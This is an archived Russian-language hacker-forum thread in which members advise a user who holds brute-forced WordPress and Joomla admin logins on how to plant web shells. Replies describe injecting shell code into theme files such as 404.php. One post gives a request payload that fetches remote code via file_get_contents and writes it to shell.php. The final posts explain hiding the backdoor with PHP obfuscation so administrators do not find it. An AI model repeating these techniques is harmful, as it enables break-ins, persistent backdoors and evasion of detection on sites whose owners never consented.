PDA

Просмотр полной версии : Вопрос по заливке шелла


Demchik
16.07.2015, 11:13
Накопилось достаточно много доступов в админки вордпресс,джумлу с брута.В большинство не получается залиться.Думаю не хватает прав на запись.Если я дам несколько доступов,может кто-нибудь посмотрет,возможно ли туда залиться в принципе или можно забить на это дело?

Sum.cogitans
16.07.2015, 11:31
Закинь один из WP в личку, гляну.

С плагинами есть хитрость - можно менять исходник, но иногда сохранение дропается, т.к. количество строк шела значительно превышает размер кода плагина.

В таком случае, надо выбрать самый объемный или установить что-то.

PoliGroS
16.07.2015, 12:17
Как варик побовать пролить шелл ли в тему ил в плагины, или же произвести установку, + пробовать залить как медиа в папку аплоадс, которая почти всегда открыта для записи.

Другой вариант попробовать взять аплоадер уже написаний и пролить.

Sum.cogitans
16.07.2015, 15:34
По WordPress вопрос в личке закрыли, что касается jooml'ы вопрос открыт.

Я ее не трогаю - брезгываю.

strelok20094
16.07.2015, 17:06
Если стоит плагин для управления бд сайта можно через mysql попробовать залить.

Demchik
16.07.2015, 22:37
Да,с джумлай пока непонятки...

Filipp
16.07.2015, 23:52
Странно, а что сложного в заливке шелла на WP? Берешь заходишь в -> Внешний Вид -> Редактор -> 404.php и туда пихаешь код шелла, заливаешься в нужное место, а потом код 404 страницы ставишь на место.

(На будущее)

Demchik
17.07.2015, 11:29
приму к сведению

Demchik
18.07.2015, 22:36
не получается организовать бэкдор таким способом:

в темах или другом месте в файл .php вставляю

по идеи должен в этой директории появится файл-шелл sys.php ,но ни хрена не выходит.Подскажите ,как сделать бзкдор

Filipp
18.07.2015, 23:00
↑ (https://antichat.live/posts/3869988/)
не получается организовать бэкдор таким способом:
в темах или другом месте в файл .php вставляю
по идеи должен в этой директории появится файл-шелл sys.php ,но ни хрена не выходит.Подскажите ,как сделать бзкдор


Вставляешь в нужный тебе PHP-шник выполнение кода:




Далее:


site.ru/example.php?cmd=$url = "http://site.ru/shell.txt";$content = file_get_contents($url);$h = fopen("shell.php","w");$text = "$content";fwrite($h,$text);fclose($h);

И все, шелл залит. Много раз этой вещью пользовался. А вообще тебе бы не мешало погуглить, или хотя бы поискать инфу на форуме. То что тебе нужно, уже давным давно есть (https://antichat.live/threads/307894/).

Demchik
19.07.2015, 00:22
Спасибо за помощь.Действительно не сложно.Вернее сложно в первый раз,потом легче.У меня

срабатывает только ,если помещать в первую строку файла.Это бросается в глаза,когда открываешь файл.Есть способ втюхать между строк,в общем ,как нибудь замаскировать ?

Filipp
19.07.2015, 00:38
↑ (https://antichat.live/posts/3870012/)
Спасибо за помощь.Действительно не сложно.Вернее сложно в первый раз,потом легче.У меня
срабатывает только ,если помещать в первую строку файла.Это бросается в глаза,когда открываешь файл.Есть способ втюхать между строк,в общем ,как нибудь замаскировать ?


Ты надеюсь не пихал в середину скрипта ?) Можно не только в начало, если хочешь между строк, надо убрать) А вообще, есть PHP-обфусификаторы, даже онлайн. Если хочешь можешь покопаться в этом деле, может и получиться спрятать бэкдор. А то если так посудить, любой админ маломальски знающий linux сможет обнаружить это дело.


grep -rl "eval" /var/www/

Оно пройдется по всем файлам и будет искать соответствие и спалит все файлы где найдет. Тут обфусификация кода тебе должна помочь)